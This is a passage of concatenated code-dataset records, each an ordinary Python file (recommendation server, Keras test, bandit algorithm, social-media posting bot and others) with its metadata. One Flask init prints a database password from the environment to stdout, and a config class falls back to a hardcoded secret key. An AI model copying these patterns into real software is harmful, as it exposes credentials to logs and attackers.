in avoid_images :\n row.prop(item, \"name\", text=\"\", emboss=False)\n if os.path.isfile(absolute_path(item.filepath)):\n op=row.operator(\"autorelad.reveal_explorer\", text=\"\", icon='ZOOM_ALL')\n op.path = item.filepath\n op2=row.operator(\"autorelad.open_image\", text=\"\", icon='GREASEPENCIL')\n op2.path = item.filepath\n else:\n row.label(text='', icon=\"ERROR\")\n else :\n row.label(text=item.name, icon=\"LOCKED\")", "sub_path": "dev/ui_list.py", "file_name": "ui_list.py", "file_ext": "py", "file_size_in_byte": 888, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "bpy.types", "line_number": 8, "usage_type": "attribute"}, {"api_name": "global_variables.avoid_images", "line_number": 12, "usage_type": "name"}, {"api_name": "os.path.isfile", "line_number": 14, "usage_type": "call"}, {"api_name": "os.path", "line_number": 14, "usage_type": "attribute"}, {"api_name": "functions.absolute_path", "line_number": 14, "usage_type": "call"}]} +{"seq_id": "564915560", "text": "from collections import Counter\n# my_dict = {'T': 23, 'U': 22, 'T': 21,'O': 20, 'R': 32, 'S': 99}\nmy_dict = {\n 'a':50, \n 'b':58, \n 'c':56,\n 'd':40, \n 'e':100, \n 'f':20\n }\n# k=0 \nk = Counter(my_dict)\n# 3 highest values\nhigh= k.most_common(3)\ns=[]\n# print(\"Dictionary with 3 highest values:\")\n# print(\"Keys : Values\")\nfor i in high:\n s.append(i[1])\n# print(i[0],\" : \",i[1],\" \")\n# print(i[1])\nprint(s)\n\n\n \n\n\n ", "sub_path": "DICTIONARY/dque11.py", "file_name": "dque11.py", "file_ext": "py", "file_size_in_byte": 443, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "collections.Counter", "line_number": 12, "usage_type": "call"}]} +{"seq_id": "107033825", "text": "from Bio import SeqIO\n\ncodons = {}\n\n# read codons\nwith open('codon_table.txt', 'r') as f:\n for line in f:\n keys = line.split()[::2]\n values = line.split()[1::2]\n codons.update(dict(zip(keys, values)))\n\n# read sequences\nwith open('splc.txt', 'r') as f:\n sequences = [str(record.seq) for record in SeqIO.parse(f, \"fasta\")]\n\n# extract exons\nexons = sequences[0]\nfor i in range(1, len(sequences)):\n exons = exons.replace(sequences[i], \"\")\n\n# make rna\nrna = exons.replace(\"T\", \"U\")\n\n# make protein string, get rid of last 3 symbols, which are the stop codon\nprint(\"\".join([codons[i] for i in [rna[x:x + 3] for x in range(0, len(rna) - 3, 3)]]))\n\n", "sub_path": "bioinformatics_stronghold/splc.py", "file_name": "splc.py", "file_ext": "py", "file_size_in_byte": 671, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "Bio.SeqIO.parse", "line_number": 14, "usage_type": "call"}, {"api_name": "Bio.SeqIO", "line_number": 14, "usage_type": "name"}]} +{"seq_id": "372309555", "text": "# -*- coding:utf-8 -*-\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport logging\nimport os\nimport sys\nimport time\nimport operator\nimport numpy as np\nimport tensorflow as tf\nfrom flask import Flask, jsonify\npwd = os.getcwd()\nsys.path.append(pwd+\"/SHRecsys\")\nfrom shrecsys.util.fileSystemUtil import FileSystemUtil\nfrom shrecsys.preprocessing.preKmeans import load_sen2vec_embedding\nfrom shrecsys.util.tensorUtil import TensorUtil\nlogging.getLogger().setLevel(logging.INFO)\nos.environ['TF_CPP_MIN_LOG_LEVEL']='2'\nROOT = pwd + \"/data/data_online\"\nTOP_K_CLUSTER = 100\ndef build_videos_value(cluster_videos_val):\n cluster_videos = dict()\n cluster_val = dict()\n for cluster in cluster_videos_val.keys():\n vid = np.zeros([len(cluster_videos_val[cluster]), 1])\n video_val = np.zeros([len(cluster_videos_val[cluster]), 1])\n sorted_videos = sorted(cluster_videos_val.get(cluster).items(), key=operator.itemgetter(1), reverse=True)\n for index, val in enumerate(sorted_videos):\n vid[index] = val[0]\n video_val[index] = val[1]\n cluster_videos[cluster] = vid\n cluster_val[cluster] = video_val\n return cluster_videos, cluster_val\n\ndef build_videos_index(view_seqs):\n seqs_video_index = dict()\n index = 0\n for seq in view_seqs:\n for video in seq:\n if video not in seqs_video_index.keys():\n seqs_video_index[video] = len(seqs_video_index)\n index += 1\n if index % 10000 == 0:\n logging.info(\"build view sequence video index: {}\".format(index))\n return seqs_video_index\n\nfstool = FileSystemUtil()\ncluster_center = fstool.load_obj(ROOT, \"cluster_centers\")\ncluster_videos_val = fstool.load_obj(ROOT, \"cluster_videos_val\")\ninput_view_seqs=open(ROOT+\"/view_seqs\", \"r\")\nview_seqs = view_seqs = [line.strip().split() for line in input_view_seqs.readlines()]\nseqs_video_index = build_videos_index(view_seqs)\nvideos_embedding, videos_index = load_sen2vec_embedding(ROOT+\"/sentence_embed.vec\", seqs_video_index)\ncluster_videos, cluster_values = build_videos_value(cluster_videos_val)\ntest = np.array(videos_embedding)\nsess = tf.Session()\nseq_tensor = tf.placeholder(shape=[1,None], dtype=tf.int32)\nrating_tensor = tf.placeholder(shape=[1,None], dtype=tf.float32)\nvideos_embedding_tensor = tf.Variable(test, dtype=tf.float32, name=\"videos_embedding\")\ncluster_centers_tensor = tf.placeholder(shape=[None, None], dtype=tf.float32)\nseq_embed = tf.nn.embedding_lookup(videos_embedding_tensor, seq_tensor)\nweight_mul = tf.multiply(seq_embed, tf.transpose(rating_tensor))\nweight_sum = tf.reduce_sum(weight_mul, axis=1)\npredict_mean = weight_sum / tf.reduce_sum(rating_tensor)\ndist = tf.matmul(predict_mean, cluster_centers_tensor, transpose_b=True)\ntop_val_tensor, top_idx_tensor = tf.nn.top_k(dist, k=TOP_K_CLUSTER)\n\nsess.run(tf.global_variables_initializer())\napp = Flask(__name__)\ntftool = TensorUtil()\n@app.route('/dnn/', methods=['GET'])\ndef dnn(view_line):\n start_time = time.time()\n view = view_line.split(\" \")\n videos_seq, rating = view[0], view[1]\n\n videos_seq = [token for token in videos_seq.strip().split(\",\")]\n rating = [float(token) for token in rating.strip().split(\",\")]\n\n assert len(videos_seq) == len(rating)\n logging.info(\"row_videos:{}\".format(videos_seq))\n logging.info(\"row_rating:{}\".format(rating))\n idx_seq = []\n use_rating = []\n for i, video in enumerate(videos_seq):\n if video in videos_index:\n idx_seq.append(videos_index[video])\n use_rating.append(rating[i])\n rec_result = dict()\n\n logging.critical(\"videos:{}\".format(idx_seq))\n logging.critical(\"rating:{}\".format(use_rating))\n\n if len(idx_seq) > 0:\n seq = np.expand_dims(idx_seq, axis=0)\n use_rating = np.expand_dims(use_rating, axis=0)\n logging.critical(\"user:{}\".format(seq))\n logging.critical(\"rating{}:\".format(use_rating))\n #logging.info(cluster_center.shape)\n for rating, video in zip(use_rating, seq):\n top_val, top_idx = sess.run([top_val_tensor, top_idx_tensor],\n feed_dict={seq_tensor: [video],\n rating_tensor: [rating],\n #videos_embedding_tensor: videos_embedding,\n cluster_centers_tensor: cluster_center})\n top_idx = top_idx[0]\n top_val = top_val[0]\n videos_seq = set(videos_seq)\n for i, idx in enumerate(top_idx):\n values = np.multiply(top_val[i], cluster_values[top_idx[i]][0:100])\n vid = cluster_videos[top_idx[i]][0:100]\n for j, res in enumerate(zip(vid, values)):\n if int(res[0][0]) not in videos_seq:\n if int(res[0][0]) not in rec_result.keys():\n rec_result[int(res[0][0])] = res[1][0]\n else:\n rec_result[int(res[0][0])] += res[1][0]\n sort_dict = dict(sorted(rec_result.items(), key=operator.itemgetter(1), reverse=True)[0:100])\n else:\n logging.critical(\"not contained!\")\n sort_dict = {}\n\n end_time = time.time()\n logging.critical(\"cost time %fs\" % (end_time - start_time))\n\n return jsonify(sort_dict)\n\nif __name__ == '__main__':\n app.run(host='10.18.18.66', port=7080)", "sub_path": "shrecsys/examples/kmeans/kmeans_predict.py", "file_name": "kmeans_predict.py", "file_ext": "py", "file_size_in_byte": 5500, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "os.getcwd", "line_number": 14, "usage_type": "call"}, {"api_name": "sys.path.append", "line_number": 15, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 15, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 19, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 19, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 20, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 28, "usage_type": "call"}, {"api_name": "operator.itemgetter", "line_number": 29, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 46, "usage_type": "call"}, {"api_name": "shrecsys.util.fileSystemUtil.FileSystemUtil", "line_number": 49, "usage_type": "call"}, {"api_name": "shrecsys.preprocessing.preKmeans.load_sen2vec_embedding", "line_number": 55, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 57, "usage_type": "call"}, {"api_name": "tensorflow.Session", "line_number": 58, "usage_type": "call"}, {"api_name": "tensorflow.placeholder", "line_number": 59, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 59, "usage_type": "attribute"}, {"api_name": "tensorflow.placeholder", "line_number": 60, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 60, "usage_type": "attribute"}, {"api_name": "tensorflow.Variable", "line_number": 61, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 61, "usage_type": "attribute"}, {"api_name": "tensorflow.placeholder", "line_number": 62, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 62, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.embedding_lookup", "line_number": 63, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 63, "usage_type": "attribute"}, {"api_name": "tensorflow.multiply", "line_number": 64, "usage_type": "call"}, {"api_name": "tensorflow.transpose", "line_number": 64, "usage_type": "call"}, {"api_name": "tensorflow.reduce_sum", "line_number": 65, "usage_type": "call"}, {"api_name": "tensorflow.reduce_sum", "line_number": 66, "usage_type": "call"}, {"api_name": "tensorflow.matmul", "line_number": 67, "usage_type": "call"}, {"api_name": "tensorflow.nn.top_k", "line_number": 68, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 68, "usage_type": "attribute"}, {"api_name": "tensorflow.global_variables_initializer", "line_number": 70, "usage_type": "call"}, {"api_name": "flask.Flask", "line_number": 71, "usage_type": "call"}, {"api_name": "shrecsys.util.tensorUtil.TensorUtil", "line_number": 72, "usage_type": "call"}, {"api_name": "time.time", "line_number": 75, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 83, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 84, "usage_type": "call"}, {"api_name": "logging.critical", "line_number": 93, "usage_type": "call"}, {"api_name": "logging.critical", "line_number": 94, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 97, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 98, "usage_type": "call"}, {"api_name": "logging.critical", "line_number": 99, "usage_type": "call"}, {"api_name": "logging.critical", "line_number": 100, "usage_type": "call"}, {"api_name": "numpy.multiply", "line_number": 112, "usage_type": "call"}, {"api_name": "operator.itemgetter", "line_number": 120, "usage_type": "call"}, {"api_name": "logging.critical", "line_number": 122, "usage_type": "call"}, {"api_name": "time.time", "line_number": 125, "usage_type": "call"}, {"api_name": "logging.critical", "line_number": 126, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 128, "usage_type": "call"}]} +{"seq_id": "602635218", "text": "#!/usr/bin/python\n\nimport spidev\n\n\nclass IRSensor():\n\tdef __init__(self, channel=0):\n\t\tself.spi = spidev.SpiDev()\n\t\tself.spi.open(0, 0)\n\t\tself.spi.max_speed_hz = 500000\n\n\t\tself.channel = channel\n\t\tself.data = 0\n\n\tdef ReadChannel(self):\n\t\tval = self.spi.xfer2([1, (8 + self.channel) << 4, 0])\n\t\tself.data = ((val[1] & 3) << 8) + val[2]\n\n\tdef read(self):\n\t\tv = (self.ReadChannel() / 1023.0) * 3.3\n\t\tdist = 16.2537 * v ** 4 - 129.893 * v ** 3 + 382.268 * v ** 2 - 512.611 * v + 301.439\n\t\t\n\t\treturn \"Distanz: %.2f cm\" % dist\n", "sub_path": "Sensors/IRSensor.py", "file_name": "IRSensor.py", "file_ext": "py", "file_size_in_byte": 521, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "spidev.SpiDev", "line_number": 8, "usage_type": "call"}]} +{"seq_id": "132473619", "text": "\"\"\"Refactor to replace queue logic with lfg\n\nRevision ID: d5208ea8d47f\nRevises: 6a1ea19d138f\nCreate Date: 2020-07-15 12:51:40.082517\n\n\"\"\"\nimport sqlalchemy as sa\nfrom alembic import op\n\n# revision identifiers, used by Alembic.\nrevision = \"d5208ea8d47f\"\ndown_revision = \"6a1ea19d138f\"\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n with op.batch_alter_table(\"servers\") as b:\n b.drop_column(\"friendly\")\n b.drop_column(\"scope\")\n\n\ndef downgrade():\n with op.batch_alter_table(\"servers\") as b:\n b.add_column(\n sa.Column(\n \"scope\",\n sa.VARCHAR(length=10),\n nullable=False,\n server_default=sa.text(\"'server'\"),\n )\n )\n b.add_column(sa.Column(\"friendly\", sa.BOOLEAN(), nullable=True))\n", "sub_path": "src/spellbot/versions/versions/d5208ea8d47f_refactor_to_replace_queue_logic_with_lfg.py", "file_name": "d5208ea8d47f_refactor_to_replace_queue_logic_with_lfg.py", "file_ext": "py", "file_size_in_byte": 808, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "alembic.op.batch_alter_table", "line_number": 19, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 19, "usage_type": "name"}, {"api_name": "alembic.op.batch_alter_table", "line_number": 25, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 25, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 27, "usage_type": "call"}, {"api_name": "sqlalchemy.VARCHAR", "line_number": 29, "usage_type": "call"}, {"api_name": "sqlalchemy.text", "line_number": 31, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 34, "usage_type": "call"}, {"api_name": "sqlalchemy.BOOLEAN", "line_number": 34, "usage_type": "call"}]} +{"seq_id": "227750698", "text": "# coding: utf-8\nimport csv, json, keras, sys, numpy, pickle, os\nimport pandas as pd\nimport numpy as np\nimport tensorflow as tf\n# import matplotlib.pyplot as plt\nfrom keras.preprocessing.image import ImageDataGenerator\n\nfrom numpy import argmax\nfrom keras.models import Model, load_model, Sequential\nfrom keras.layers import Input, Dense, Dropout, Flatten, Activation, Reshape\nfrom keras.layers.convolutional import Conv2D, ZeroPadding2D\nfrom keras.layers.pooling import MaxPooling2D, AveragePooling2D\nfrom keras.optimizers import SGD, Adam, Adadelta\n\nfrom keras.utils import np_utils, plot_model\n\ndef load_test_data(test_data_path):\n # 讀入測試資料\n x_test = []\n with open(test_data_path, 'r') as f:\n f.readline()\n for i, line in enumerate(f):\n data = line.split(',')\n\n # 處理pixel\n pixel = data[1].strip('\\n').split(' ')\n x_test.append(pixel)\n\n x_test = np.array(x_test,dtype=float)\n\n return x_test\n\ndef prediction_generator(model,test_data,output_path):\n predict = []\n one_hot_encoding_predict = model.predict(test_data)\n for i in range (len(one_hot_encoding_predict)):\n y = argmax(one_hot_encoding_predict[i])\n predict.append([str(i),y])\n\n filename = output_path\n text = open(filename, \"w+\")\n s = csv.writer(text,delimiter=',',lineterminator='\\n')\n s.writerow([\"id\",\"label\"])\n for i in range(len(predict)):\n s.writerow(predict[i]) \n text.close()\n\nx_test = load_test_data(sys.argv[1])\nx_test = np.resize(x_test, (x_test.shape[0], 48, 48, 1))\nx_test = x_test/255\n\nmodel = load_model(\"cnn_model.h5\")\nmodel.summary()\n# print(x_test)\n# print(model.predict(x_test))\n# predict = model.predict(x_test)\nprediction_generator(model,x_test,sys.argv[2])", "sub_path": "hw3/cnn_test.py", "file_name": "cnn_test.py", "file_ext": "py", "file_size_in_byte": 1773, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "numpy.array", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 38, "usage_type": "call"}, {"api_name": "csv.writer", "line_number": 43, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 49, "usage_type": "attribute"}, {"api_name": "numpy.resize", "line_number": 50, "usage_type": "call"}, {"api_name": "keras.models.load_model", "line_number": 53, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 58, "usage_type": "attribute"}]} +{"seq_id": "441977657", "text": "import abc\n\nimport torch\nfrom torch.distributions import MultivariateNormal\n\n\nclass MultiArmBandit:\n def __init__(self, num_arms):\n self.num_arms = num_arms\n\n @abc.abstractmethod\n def select_arm_to_pull(self):\n \"\"\"Select the arm of the bandit to pull\"\"\"\n\n @abc.abstractmethod\n def update_arms(self, arm_pulled, reward, transition_cov=None, obs_cov=None):\n \"\"\"Update the reward distribution of arms based on observed reward after pulling arm\"\"\"\n\n\nclass KFMANDB(MultiArmBandit):\n def __init__(self, prior_mean, prior_covar):\n self._mean = prior_mean\n self._cov = prior_covar\n super(KFMANDB, self).__init__(prior_mean.shape[0])\n assert (self._mean.shape[0] == self._cov.shape[0])\n assert (self._cov.shape[0] == self._cov.shape[1])\n\n def select_arm_to_pull(self):\n # Thompson sampling on the bandits and select bandit with the largest sample\n arm_dist = MultivariateNormal(self._mean, covariance_matrix=self._cov)\n sample = arm_dist.sample()\n # arm with the highest sample\n return torch.argmax(sample)\n\n def update_arms(self, arm_pulled, reward, transition_cov=None, obs_cov=None):\n if transition_cov is None or obs_cov is None:\n raise RuntimeError(\"Transition and observation covariance must be provided to KF-MANDB\")\n obs_matrix = torch.zeros((1, self.num_arms), dtype=self._mean.dtype, device=self._mean.device)\n obs_matrix[0, arm_pulled] = 1\n C = obs_matrix\n\n # Kalman predict\n pred_mean = self._mean # no change to mean\n pred_cov = self._cov + transition_cov # add process nosie\n\n # Kalman update\n innovation = reward - C @ pred_mean # tilde y_k\n innovation_cov = C @ pred_cov @ C.t() + obs_cov # S_k\n kalman_gain = pred_cov @ C.t() @ innovation_cov.inverse() # K_k\n\n # a posteriori estimate\n self._mean = pred_mean + kalman_gain @ innovation\n self._cov = pred_cov - kalman_gain @ C @ pred_cov\n # fix to be symmetric\n self._cov = (self._cov + self._cov.t()) * 0.5\n\n\nif __name__ == \"__main__\":\n from arm_pytorch_utilities import rand\n\n rand.seed(0)\n\n num_arms = 7\n obs_noise = torch.ones(1) * 1\n process_noise_scaling = 0.1\n num_costs = 3\n cost_weights = torch.rand((num_arms, num_costs))\n # each arm is a row of the cost weight; normalize so it sums to 1\n cost_weights /= cost_weights.sum(dim=1).view(num_arms, 1)\n # give special meaning to the first few arms (they are 1-hot)\n cost_weights[:num_costs, :num_costs] = torch.eye(num_costs)\n\n print(\"cost weights\")\n print(cost_weights)\n\n\n def _calculate_mab_process_noise():\n P = torch.eye(num_arms)\n for i in range(num_arms):\n for j in range(i + 1, num_arms):\n sim = torch.cosine_similarity(cost_weights[i], cost_weights[j], dim=0)\n P[i, j] = P[j, i] = sim\n return P\n\n\n process_noise = _calculate_mab_process_noise()\n print(\"process noise\")\n print(process_noise)\n\n mab = KFMANDB(torch.zeros(num_arms), torch.eye(num_arms))\n print(mab._mean)\n print(mab._cov)\n mab.update_arms(0, 0.5, transition_cov=process_noise * process_noise_scaling, obs_cov=obs_noise)\n print(mab._mean)\n print(mab._cov)\n mab.update_arms(3, 0.2, transition_cov=process_noise * process_noise_scaling, obs_cov=obs_noise)\n print(mab._mean)\n print(mab._cov)\n", "sub_path": "tampc/controller/multi_arm_bandit.py", "file_name": "multi_arm_bandit.py", "file_ext": "py", "file_size_in_byte": 3456, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "abc.abstractmethod", "line_number": 11, "usage_type": "attribute"}, {"api_name": "abc.abstractmethod", "line_number": 15, "usage_type": "attribute"}, {"api_name": "torch.distributions.MultivariateNormal", "line_number": 30, "usage_type": "call"}, {"api_name": "torch.argmax", "line_number": 33, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 38, "usage_type": "call"}, {"api_name": "arm_pytorch_utilities.rand.seed", "line_number": 61, "usage_type": "call"}, {"api_name": "arm_pytorch_utilities.rand", "line_number": 61, "usage_type": "name"}, {"api_name": "torch.ones", "line_number": 64, "usage_type": "call"}, {"api_name": "torch.rand", "line_number": 67, "usage_type": "call"}, {"api_name": "torch.eye", "line_number": 71, "usage_type": "call"}, {"api_name": "torch.eye", "line_number": 78, "usage_type": "call"}, {"api_name": "torch.cosine_similarity", "line_number": 81, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 90, "usage_type": "call"}, {"api_name": "torch.eye", "line_number": 90, "usage_type": "call"}]} +{"seq_id": "529399013", "text": "from __future__ import print_function\n\nimport boto3\nimport json\nimport time\nimport uuid\n\nprint('Loading function')\n\nclient = boto3.client('lambda')\n\ndef lambda_handler(event, context):\n\n iterations = int(event['iterations'])\n function_name = event['function_name']\n\n for i in range(0, iterations):\n start_time = int(time.time()*1000)\n _id = str(uuid.uuid4())\n arguments = \"\"\"{ \"uuid\": \"%s\", \"created_at\": %s }\"\"\" % (_id, start_time)\n\n client.invoke_async(\n FunctionName=function_name,\n InvokeArgs=arguments)\n time.sleep(0.05)\n\n", "sub_path": "tests/delay_tests/harness/harness_test.py", "file_name": "harness_test.py", "file_ext": "py", "file_size_in_byte": 601, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "boto3.client", "line_number": 10, "usage_type": "call"}, {"api_name": "time.time", "line_number": 18, "usage_type": "call"}, {"api_name": "uuid.uuid4", "line_number": 19, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 25, "usage_type": "call"}]} +{"seq_id": "271891772", "text": "from flask import Flask\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_cors import CORS, cross_origin\nfrom idb.database_tools import build_db_connection_uri_string\nimport os\n\napp = Flask(__name__)\nCORS(app)\napp.config['TESTING'] = False\napp.config['DEBUG'] = True\n\n# Setup DB from environment variables or defaults\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\napp.config['SQLALCHEMY_DATABASE_URI'] = \\\n build_db_connection_uri_string(use_env_vars=True,\n use_defaults=True)\n\nprint('URI: ' + (app.config['SQLALCHEMY_DATABASE_URI'] or 'NONE'))\nprint('EV OPTS: ' + (os.environ.get('SWE_IDB_PGDB_OPTS') or 'NONE'))\nprint('EV ADDR: ' + (os.environ.get('SWE_IDB_PGDB_ADDR') or 'NONE'))\nprint('EV PW: ' + (os.environ.get('SWE_IDB_PGDB_PW') or 'NONE'))\n\ndb = SQLAlchemy(app)\ndb_query_count = 0\n\n#### Jinja2 templating functions ###\ndef getYear(date, justYear = False):\n if(date != None):\n if(justYear):\n return date.year\n\n else:\n return date.strftime(\"%b %d, %Y\")\n else:\n return \"Year Unknown\"\ndef strNumFormatter(num):\n if(num != None):\n return '%0.2f' % float(num)\n else:\n return \"Unavailable\"\n\napp.jinja_env.globals.update(getYear=getYear)\napp.jinja_env.globals.update(strNumFormatter=strNumFormatter)\n# Setup routes for Flask\nimport idb.views\nimport idb.queries\nimport idb.api\n", "sub_path": "idb/__init__.py", "file_name": "__init__.py", "file_ext": "py", "file_size_in_byte": 1390, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "flask.Flask", "line_number": 7, "usage_type": "call"}, {"api_name": "flask_cors.CORS", "line_number": 8, "usage_type": "call"}, {"api_name": "idb.database_tools.build_db_connection_uri_string", "line_number": 15, "usage_type": "call"}, {"api_name": "os.environ.get", "line_number": 19, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 19, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 20, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 20, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 21, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 21, "usage_type": "attribute"}, {"api_name": "flask_sqlalchemy.SQLAlchemy", "line_number": 23, "usage_type": "call"}]} +{"seq_id": "589550203", "text": "import os\nimport redis\n\n\nBASE_DIR = os.path.abspath(os.path.dirname(__file__))\n\n\n# Base configuration class with default variable values\nclass BaseConfig(object):\n\n SECRET_KEY = os.environ.get('SECRET_KEY') or '1ih298e1kabds9182yekhalkcn,fnlqj09wee190ejjslndadljqoue0912ueo'\n\n DEBUG = False\n TESTING = False\n CSRF_ENABLED = True\n\n TRAINING_QUEUE = \"pipeline-training-queue\"\n\n REDIS_URL = os.getenv('REDISTOGO_URL', 'redis://localhost:6379')\n REDIS_CONNECTION = redis.from_url(REDIS_URL)\n\n\nclass DevelopmentConfig(BaseConfig):\n\n DEBUG = True\n\n # Make sure the following directory exists\n # Flask will NOT create the directory for you\n\n MONGODB_HOST = \"localhost\"\n MONGODB_NAME = \"ai_pipeline\"\n MONGODB_PORT = 27017\n\n DATASET_FOLDER = \"/home/rami/Desktop\"\n AI_PIPELINE_BASE_FOLDER = \"/home/rami/Desktop/base\"\n\n\n# Use this when deploying\nclass ProductionConfig(BaseConfig):\n\n DEBUG = False\n\n # Do not refactor into base config,\n # it isn't semantically correct to do so even though shorter code\n MONGODB_HOST = \"10.180.142.120\"\n MONGODB_NAME = \"ai_pipeline\"\n MONGODB_PORT = 27018\n\n DATASET_FOLDER = \"/home/robotics/Nextcloud/Deep-Learning/Datasets\"\n\n# Use this when testing on network\n\n\nclass TestingConfig(BaseConfig):\n\n DEBUG = True\n TESTING = True\n\n MONGODB_HOST = \"10.180.142.120\"\n MONGODB_NAME = \"ai_pipeline\"\n MONGODB_PORT = 27018\n\n DATASET_FOLDER = \"/home/rami/Desktop\"\n AI_PIPELINE_BASE_FOLDER = \"/home/rami/Desktop/base\"\n", "sub_path": "ai_pipeline_main/webui/server/config.py", "file_name": "config.py", "file_ext": "py", "file_size_in_byte": 1514, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "os.path.abspath", "line_number": 5, "usage_type": "call"}, {"api_name": "os.path", "line_number": 5, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 5, "usage_type": "call"}, {"api_name": "os.environ.get", "line_number": 11, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 11, "usage_type": "attribute"}, {"api_name": "os.getenv", "line_number": 19, "usage_type": "call"}, {"api_name": "redis.from_url", "line_number": 20, "usage_type": "call"}]} +{"seq_id": "366168725", "text": "import tweepy\nfrom mastodon import Mastodon\nfrom twitter_keys import *\nfrom os import getcwd\nimport linecache\n\ndef main():\n\tpath = getcwd() + '/output/'\n\n\t# Open curator file to see which line of the studio log needs to be read\n\tf = open(path + 'curator.log', 'r+')\n\tbookmark = f.readline().rstrip()\n\tindex = int(bookmark)\n\tbookmark = int(bookmark) + 1\n\tf.seek(0)\n\tf.write(str(bookmark))\n\tf.truncate()\n\tf.close()\n\n\t# Read the title of the artwork from the specified line in the studio log, then strip the \\n and save to titleofart\n\ttitleofart = linecache.getline(path + 'studio.log', index).rstrip()\n\n\ttoot(open(path + titleofart + '.png', 'rb'))\n\tupload_and_tweet(path + titleofart + '.png')\n\ndef toot(masterpiece):\n\n\tm = Mastodon(access_token='mastodon.secret', api_base_url='https://botsin.space')\n\tart = m.media_post(masterpiece, \"image/png\")\n\tm.status_post(\"\", media_ids=art[\"id\"])\n\t\ndef upload_and_tweet(masterpiece):\n \n auth = tweepy.OAuth1UserHandler(APP_KEY, APP_SECRET, OAUTH_TOKEN, OAUTH_TOKEN_SECRET)\n api = tweepy.API(auth)\n \n media = api.media_upload(masterpiece)\n media_id = media.media_id\n \n tweet(media_id)\n \ndef tweet(masterpiece):\n\n\tt = tweepy.Client(consumer_key=APP_KEY, consumer_secret=APP_SECRET, access_token=OAUTH_TOKEN, access_token_secret=OAUTH_TOKEN_SECRET)\n\tt.create_tweet(text='',media_ids=[masterpiece])\n\nif __name__ == \"__main__\":\n main()\n", "sub_path": "promoter.py", "file_name": "promoter.py", "file_ext": "py", "file_size_in_byte": 1385, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "os.getcwd", "line_number": 8, "usage_type": "call"}, {"api_name": "linecache.getline", "line_number": 21, "usage_type": "call"}, {"api_name": "mastodon.Mastodon", "line_number": 28, "usage_type": "call"}, {"api_name": "tweepy.OAuth1UserHandler", "line_number": 34, "usage_type": "call"}, {"api_name": "tweepy.API", "line_number": 35, "usage_type": "call"}, {"api_name": "tweepy.Client", "line_number": 44, "usage_type": "call"}]} +{"seq_id": "416647632", "text": "## Hw 3 Question 1\n##\n## Uses numpy's random number generator\n\nimport numpy as np\nimport math as mp\nimport matplotlib.pyplot as plt\n#Variables\nN=1000000\nNbin = 50\ntally_bin = []\n#construct frequency distribution\nfor i in range(0,N):\n\n\tx = -np.log(np.random.random())\n\tif(x<=5):\n\t\ttally_bin.append(x)\nhist, bins = np.histogram(tally_bin, bins=50) #creates the historgram, 50 bins\nwidth = 0.7 * (bins[1] - bins[0]) #define width of bars\ncenter = (bins[:-1] + bins[1:]) / 2 #define center of bar graph\n#define actual PDF\nx=np.linspace(0,5,N)\ny= hist.max() * np.exp(-x)\n#plot histogram\nhisto = plt.bar(center, hist, align='center', width=width)\n#plot actual PDF\nactual = 